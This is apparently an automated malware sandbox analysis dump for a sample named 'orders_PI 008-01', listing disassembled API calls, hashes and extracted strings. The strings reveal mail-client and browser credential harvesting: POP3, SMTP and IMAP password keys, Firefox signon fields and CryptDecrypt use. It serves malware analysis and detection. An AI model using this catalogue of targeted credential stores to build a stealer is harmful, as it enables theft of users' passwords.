                                        • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                        • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                        • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProcProtectVirtual$HandleModule
                                        • String ID:
                                        • API String ID: 2152742572-0
                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                        • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                        APIs
                                          • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75570A60,?,00000000), ref: 00410D1C
                                          • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                        • memset.MSVCRT ref: 00410E10
                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                        • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 889583718-2036018995
                                        • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                        • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                        • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                        • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                        APIs
                                        • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                        • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                        • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                        • LockResource.KERNEL32(00000000), ref: 00410CA1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                        • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                        • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                        • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                        APIs
                                        • memset.MSVCRT ref: 004109F7
                                          • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                          • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                        • memset.MSVCRT ref: 00410A32
                                        • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                        • String ID:
                                        • API String ID: 3143880245-0
                                        • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                        • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                        • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                        • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                        APIs
                                        • malloc.MSVCRT ref: 00406F4C
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`Wu,00407A43,00000001,?,00000000,`Wu,00407DBD,00000000,?,?), ref: 00406F64
                                        • free.MSVCRT ref: 00406F6D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID: `Wu
                                        • API String ID: 3056473165-3261129705
                                        • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                        • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                        • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                        • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                        • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                        • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                        • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D5C
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D7A
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D98
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408DA8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                        • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                        • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                        • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                        APIs
                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                        • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFontIndirect_mbscpymemset
                                        • String ID: Arial
                                        • API String ID: 3853255127-493054409
                                        • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                        • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                        • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                        • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                        APIs
                                          • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                        • _strcmpi.MSVCRT ref: 0040CEC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$_strcmpimemset
                                        • String ID: /stext
                                        • API String ID: 520177685-3817206916
                                        • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                        • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                        • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                        • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                        APIs
                                          • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                        • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID:
                                        • API String ID: 145871493-0
                                        • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                        • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                        • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                        • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                        APIs
                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                          • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                          • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                          • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                        • String ID:
                                        • API String ID: 4165544737-0
                                        • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                        • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                        • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                        • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                        • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                        • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                        • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                        APIs
                                        • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                        • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                        • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                        • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                        • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                        • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                        • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                        APIs
                                        • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        APIs
                                        • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                        • API String ID: 2238633743-192783356
                                        APIs
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                        • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                        • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                        • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                        Similarity
                                        • API ID: _mbscpy$QueryValue$CloseOpen
                                        • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                        • API String ID: 52435246-1534328989
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00406E06
                                          • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                        • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                        • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                        • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                        • GetLastError.KERNEL32 ref: 00406E74
                                        • CloseHandle.KERNEL32(?), ref: 00406E80
                                        • GetLastError.KERNEL32 ref: 00406E8B
                                        • CloseClipboard.USER32 ref: 00406E94
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        Similarity
                                        • API ID: PrivateProfileString_mbscmpstrlen
                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                        • API String ID: 3963849919-1658304561
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID: (yE$(yE$(yE
                                        • API String ID: 1865533344-362086290
                                        APIs
                                        • strlen.MSVCRT ref: 004431AD
                                        • strncmp.MSVCRT ref: 004431BD
                                        • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                        • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                        Similarity
                                        • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                        • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                        • API String ID: 1895597112-3210201812
                                        Similarity
                                        • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                        • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                        • API String ID: 1714764973-479759155
                                        APIs
                                        • memset.MSVCRT ref: 0040EBD8
                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                        • memset.MSVCRT ref: 0040EC2B
                                        • memset.MSVCRT ref: 0040EC47
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                        • memset.MSVCRT ref: 0040ECDD
                                        • memset.MSVCRT ref: 0040ECF2
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                        • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                        • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                        • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                        • memset.MSVCRT ref: 0040EDE1
                                        Similarity
                                        • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                        • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                        • API String ID: 3137614212-1455797042
                                        Similarity
                                        • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                        • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                        • API String ID: 2814039832-2206097438
                                        APIs
                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                          • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                          • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                          • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                        • memset.MSVCRT ref: 0040E5B8
                                        • memset.MSVCRT ref: 0040E5CD
                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
